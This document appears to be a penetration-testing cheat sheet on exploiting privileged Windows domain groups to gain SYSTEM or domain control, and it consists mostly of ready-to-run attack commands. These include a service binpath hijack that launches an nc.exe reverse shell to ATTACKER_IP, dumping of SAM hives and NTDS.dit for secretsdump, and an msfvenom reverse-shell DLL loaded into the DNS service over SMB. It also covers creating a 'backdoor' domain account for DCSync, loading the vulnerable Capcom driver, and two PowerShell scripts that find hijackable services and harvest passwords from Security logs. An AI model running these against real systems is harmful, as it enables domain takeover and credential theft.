Check Groups

whoami /groups
net localgroup
net group /domain

Server Operators

Exists only on domain controllers. Members can log on to DCs interactively, start, stop and reconfigure services, back up and restore files (SeBackupPrivilege and SeRestorePrivilege), create shares and shut the machine down.

Exploit — Modify Service

Record the current binpath first (sc qc) so it can be restored afterwards, then point the service at the payload and bounce it:
sc config VMTools binpath= "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"
sc stop VMTools
sc start VMTools
The payload runs as the service account (LocalSystem for the services below). sc start reports error 1053 because nc.exe never checks in with the Service Control Manager; by then the process is already running. Any service whose DACL grants the group change-config plus start and stop rights works: check with sc sdshow and look for an ACE ending in ;;;SO) whose rights contain DC, RP and WP. Common targets:
sc qc AppReadiness
sc qc VMTools
sc qc browser
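To find which services the group can actually hijack, the following is an added example (not code from the original page): it parses the SDDL that sc sdshow prints for every service and reports the ones granting the SDDL alias SO (Server Operators) change-config plus start and stop, or owner-level rights (WRITE_DAC, WRITE_OWNER, GENERIC_ALL). It assumes Windows PowerShell on the DC itself. The function name and its -Trustee parameter are this example's own; passing an explicit SID string instead of SO also answers the DnsAdmins question further down (does the group have stop/start on the dns service?).

```powershell
# Added example, not part of the original page. Parses `sc.exe sdshow` SDDL for
# every service and lists those a trustee can take over via the
# "sc config ... / sc stop / sc start" chain.
#
# Service access-right letters in SDDL:
#   CC SERVICE_QUERY_CONFIG   DC SERVICE_CHANGE_CONFIG   LC SERVICE_QUERY_STATUS
#   SW SERVICE_ENUMERATE_DEPENDENTS   RP SERVICE_START   WP SERVICE_STOP
#   DT SERVICE_PAUSE_CONTINUE   LO SERVICE_INTERROGATE   CR USER_DEFINED_CONTROL
#   SD DELETE   RC READ_CONTROL   WD WRITE_DAC   WO WRITE_OWNER   GA GENERIC_ALL
function Get-HijackableServices {
    param(
        # SDDL trustee(s) to look for. 'SO' = Server Operators. A domain group such
        # as DnsAdmins has no alias; pass its SID string (S-1-5-21-...-RID) instead.
        [string[]]$Trustee = @('SO')
    )
    # Service account and image path, keyed by service name, for the report.
    $info = @{}
    Get-CimInstance Win32_Service | ForEach-Object { $info[$_.Name] = $_ }

    foreach ($svc in Get-Service) {
        # sc.exe, not the PowerShell alias sc (Set-Content). Output is one SDDL string.
        $sddl = (sc.exe sdshow $svc.Name 2>$null | Out-String).Trim()
        if (-not $sddl.StartsWith('D:')) { continue }   # access denied or unexpected output

        # ACE layout: (type;flags;rights;object_guid;inherit_guid;trustee); only allow ACEs matter.
        foreach ($ace in [regex]::Matches($sddl, '\(A;[^;]*;([A-Z]*);[^;]*;[^;]*;([^)]+)\)')) {
            $rights = $ace.Groups[1].Value
            $who    = $ace.Groups[2].Value
            if ($Trustee -notcontains $who) { continue }

            # Rights come as two-letter pairs; split them so 'WD' is not matched inside 'SWDT'.
            $pairs = for ($i = 0; $i + 1 -lt $rights.Length; $i += 2) { $rights.Substring($i, 2) }
            $full  = @('WD', 'WO', 'GA') | Where-Object { $pairs -contains $_ }
            $chain = ($pairs -contains 'DC') -and ($pairs -contains 'RP') -and ($pairs -contains 'WP')
            if (-not $full -and -not $chain) { continue }

            if ($full) { $via = "owner-level ($($full -join ','))" } else { $via = 'DC+RP+WP' }
            [pscustomobject]@{
                Service = $svc.Name
                RunsAs  = $info[$svc.Name].StartName
                BinPath = $info[$svc.Name].PathName
                Trustee = $who
                Rights  = $rights
                Via     = $via
            }
        }
    }
}

# Services Server Operators can reconfigure and restart; the LocalSystem ones give SYSTEM.
Get-HijackableServices | Sort-Object RunsAs | Format-Table -AutoSize
```

Services that report LocalSystem in RunsAs are the ones worth the sc config line above; anything running as a virtual or network service account gives only that account.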

Backup Operators

SeBackupPrivilege + SeRestorePrivilege: read any file regardless of its ACL (backup semantics) and write any file (restore semantics). Members can also log on locally and shut the machine down. Both privileges are present but disabled in the token; reg.exe, robocopy /B and diskshadow enable them on their own, while ordinary tools (type, Get-Content) do not and still get Access Denied.

Dump SAM & SYSTEM

reg save HKLM\SAM C:\Temp\SAM
reg save HKLM\SYSTEM C:\Temp\SYSTEM
reg save HKLM\SECURITY C:\Temp\SECURITY
Feed all three hives to impacket-secretsdump in LOCAL mode for local hashes, LSA secrets and cached domain logons. On a domain controller the SAM holds only the DSRM administrator; the domain hashes live in NTDS.dit (next section).

Dump NTDS.dit (Domain Controller)

ntds.dit is locked while the DC runs, so take a Volume Shadow Copy and read from that. Interactively:
diskshadow.exe

set context persistent nowriters
add volume C: alias myvolume
create
expose %myvolume% Z:
From a non-interactive shell (WinRM) put the same four lines in a text file and run diskshadow /s with that file. Then copy with backup semantics:
robocopy /B Z:\Windows\NTDS C:\Temp ntds.dit
Extract (the SYSTEM hive must come from the same DC, since it supplies the boot key that decrypts the password encryption key inside NTDS.dit):
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL

Read Any File

robocopy /B C:\Users\Administrator\Desktop C:\Temp confidential.txt
/B (backup mode) is what makes robocopy use SeBackupPrivilege; a plain copy or type on the same file still fails with Access Denied. See also Token Abuse for more SeBackupPrivilege techniques.

DnsAdmins

Members can set the DNS server's ServerLevelPluginDll value through dnscmd; the next time the DNS service starts it loads that DLL into dns.exe, which runs as SYSTEM on the DC. The path can be a UNC path, so the DC's machine account fetches the DLL over SMB. Membership does not by itself include stop/start rights on the DNS service: check them (sc sdshow dns on the DC) before relying on the restart below, or wait for a scheduled reboot.

Create Malicious DLL

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll -o evil.dll
The payload fires from DllMain. Because the DLL does not export the plugin functions the DNS server expects, the service typically fails to start cleanly afterwards and stays down until cleanup.

Host on SMB

impacket-smbserver share . -smb2support

Load DLL into DNS

dnscmd DC01 /config /serverlevelplugindll \\ATTACKER_IP\share\evil.dll

Restart DNS Service

sc \\DC01 stop dns
sc \\DC01 start dns

Cleanup

dnscmd DC01 /config /serverlevelplugindll ""
dnscmd talks to the DNS server over RPC, so this only works while the service is up. If the service is stuck, delete the ServerLevelPluginDll value under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters from the SYSTEM shell, then start the service again. Restarting DNS on a domain controller breaks name resolution, and with it Kerberos and LDAP lookups, for the duration; coordinate with the client in real engagements.

Account Operators

Can create and modify users and groups that are not protected by AdminSDHolder, so not Domain Admins, Administrators, the other built-in *Operators groups or their members. Can also log on to DCs locally. New passwords must satisfy the domain password policy.

Add User to Domain

net user backdoor P@ssw0rd /add /domain
net group "Remote Desktop Users" backdoor /add /domain

Modify Existing User

net user targetuser NewP@ss123! /domain

Modify Group Membership

net group "Exchange Windows Permissions" backdoor /add /domain
Exchange Windows Permissions is not AdminSDHolder-protected, and in Exchange installations predating Microsoft's 2019 permissions fix it holds WriteDacl on the domain object: use it to grant the new account DS-Replication-Get-Changes and DS-Replication-Get-Changes-All, then DCSync.

Print Operators

Can log on to DCs locally, manage printers and load device drivers: SeLoadDriverPrivilege.

Load Vulnerable Driver

# Capcom.sys
LoadDriver.exe System\CurrentControlSet\Capcom C:\Temp\Capcom.sys
ExploitCapcom.exe
The loader enables SeLoadDriverPrivilege (present but disabled in the token) and creates the service key under HKCU, because the group cannot write HKLM\SYSTEM\CurrentControlSet\Services; that is why the key path is given relative to the user hive. Capcom.sys is on Microsoft's vulnerable-driver blocklist, so where that list is enforced (HVCI, current Windows 11 defaults) the load is refused and a different driver is needed. See Token Abuse — SeLoadDriverPrivilege.

Remote Desktop Users

Interactive logon over RDP; no extra privileges by itself.
xfreerdp3 /v:TARGET /u:user /p:password /cert:ignore
Once in, enumerate local privilege escalation vectors, including membership of the groups above.

Remote Management Users

WinRM access (PowerShell remoting on TCP 5985/5986); no extra privileges by itself.
evil-winrm -i TARGET -u user -p password

Hyper-V Administrators

Full control over the Hyper-V VMs on the host. If a domain controller runs as a guest, its virtual disk can be copied and mined offline for NTDS.dit.
# Copy-Item only works while the VM is off; a running VM holds its VHDX open
Copy-Item "C:\VMs\DC01\disk.vhdx" C:\Temp\
# For a running VM, export it instead (copies the disk without stopping the guest)
Export-VM -Name DC01 -Path C:\Temp
# Mount the copied VHDX offline (Mount-VHD, or guestmount on Linux) and take
# Windows\NTDS\ntds.dit plus Windows\System32\config\SYSTEM for secretsdump

Event Log Readers

Read access to event logs, including Security (its default DACL grants Event Log Readers, S-1-5-32-573, read). Credentials show up in 4688 process-creation events when command-line auditing is enabled (net use with a password, schtasks /RP, cmdkey /pass:); 4648 tells you which accounts are used with explicit credentials. Scanning every message body works but is slow; filter on event ID first.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } | Where-Object { $_.Message -match 'password|/pass|/user:' }
wevtutil qe Security /q:"*[System[EventID=4688]]" /rd:true /c:500 /f:text | findstr /i "password /pass /user:"
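A more structured version of the same hunt, as an added example that is not code from the original page: it pulls 4688 events, separates the EventData fields through the event XML and tests only the CommandLine field against a few password-bearing command-line shapes. It assumes Windows PowerShell and that Audit Process Creation with "Include command line in process creation events" is enabled on the target; the function name and the regex list are this example's own.

```powershell
# Added example, not part of the original page: flag Security 4688 events whose
# command line carries a cleartext password. CommandLine is empty unless
# command-line auditing is on, in which case the event is skipped.
function Find-CredentialsInProcessEvents {
    param(
        [string]$ComputerName = $env:COMPUTERNAME,   # remote use needs the Remote Event Log Management firewall rule
        [int]$Days = 30,
        [int]$MaxEvents = 50000
    )
    # Command-line shapes that commonly carry a password; assumed patterns, extend for the target's tooling.
    $patterns = @(
        '(?i)net\s+use\s+\S+\s+(\S+)\s+/user:',   # net use \\host\share P@ss /user:dom\acct
        '(?i)/(rp|pass|password)[:= ]+(\S+)',     # schtasks /RP, cmdkey /pass:, wmic /password:
        '(?i)\s-(p|pass|password)\s+(\S+)',       # psexec -p and similar wrappers
        '(?i)ConvertTo-SecureString\s+\S+'        # inline PowerShell credentials
    )
    $filter = @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddDays(-$Days) }
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction Stop |
    ForEach-Object {
        # EventData fields are only reliably separable through the event XML.
        $xml  = [xml]$_.ToXml()
        $data = @{}
        foreach ($node in $xml.Event.EventData.Data) { $data[$node.Name] = $node.'#text' }
        $cmd = $data['CommandLine']
        if ([string]::IsNullOrEmpty($cmd)) { return }   # inside ForEach-Object, return moves to the next event

        foreach ($p in $patterns) {
            if ($cmd -match $p) {
                [pscustomobject]@{
                    Time    = $_.TimeCreated
                    Subject = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
                    Process = $data['NewProcessName']
                    Match   = $Matches[0]
                    Command = $cmd
                }
                break   # one hit per event is enough
            }
        }
    }
}

Find-CredentialsInProcessEvents | Format-List
```

Subject is the account that launched the process, which is usually the one whose password is on the command line; where it is not (net use with /user:), the Match column shows the target account too.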

Quick Reference

| Group | Impact | Technique |
|---|---|---|
| Server Operators | SYSTEM on the DC | Modify service binpath |
| Backup Operators | SYSTEM; domain hashes on a DC | Dump SAM/NTDS.dit |
| DnsAdmins | SYSTEM on the DC | Load DLL in DNS service |
| Account Operators | Domain | Create/modify users and unprotected groups |
| Print Operators | SYSTEM | Load kernel driver |
| Hyper-V Administrators | Domain (if a DC is a guest) | Clone DC virtual disk |
| Event Log Readers | Creds | Read security logs |